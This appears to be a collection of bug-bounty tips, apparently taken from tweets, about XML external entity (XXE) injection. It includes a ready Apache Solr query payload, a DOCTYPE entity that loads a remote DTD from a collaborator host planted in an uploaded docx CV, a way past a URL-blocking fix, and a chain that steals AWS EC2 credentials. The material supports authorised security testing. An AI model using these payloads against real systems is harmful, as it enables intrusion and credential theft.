XXE

• see an apache solr GET/POST to /select ? Set the 'q' parameter to the following for an XXE injection: /select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://collab.burp.net"><a></a>'} - https://packetstormsecurity.com/files/144678/Apache-Solr-7.0.1-XXE-Injection-Code-Execution.html… #BugBounty

• #bugbountytip Company fixed an XXE by blocking arbitrary URL(s) to grab an SVG? Try & bypass it by embedding the SVG using the Data URI protocol handler [data:image/svg+xml;base64,XXE_PAYLOAD], most of the time it would work! #BugBounty #TogetherWeHitHarder #infosec #infosecurity

• https://twitter.com/11xuxx/status/1250764273623629826

• XXE by injecting METADATA in Image bytes --> Blind SSRF via local dtd --> grabbed AWS EC2 credentials blindly --> Powned #bugbountytips #bugbountytip

• jobs.targ.com site fills in personal info by uploading cv & parsing. Accepted docx, pdf, etc. 1. Unzip docx & edit word/document.xml 3. Add <!DOCTYPE foo [<!ENTITY % xxe SYSTEM "http://burp.collab.net/mal.dtd"> %xxe;]> 3. Upload 4. Profit! #BugBounty

• #BugBountyTip time: when you see a POST request made with JSON, convert this to XML and test for XXE. You can use "Content-type converter" extension on@Burp_Suite to do achieve this!

https://twitter.com/Kei0x/status/1172267556226445313

• XXE

  1. change password func -> JSON

  2. converted to XML -> 200 OK

  3. created dtd file on my ec2 and started webserver on port 80

  4. crafted a XXE payload!

  5. bounty!

  Always convert POST/PUT/PATCH body to xml and resend req, don't forget to change the content-type.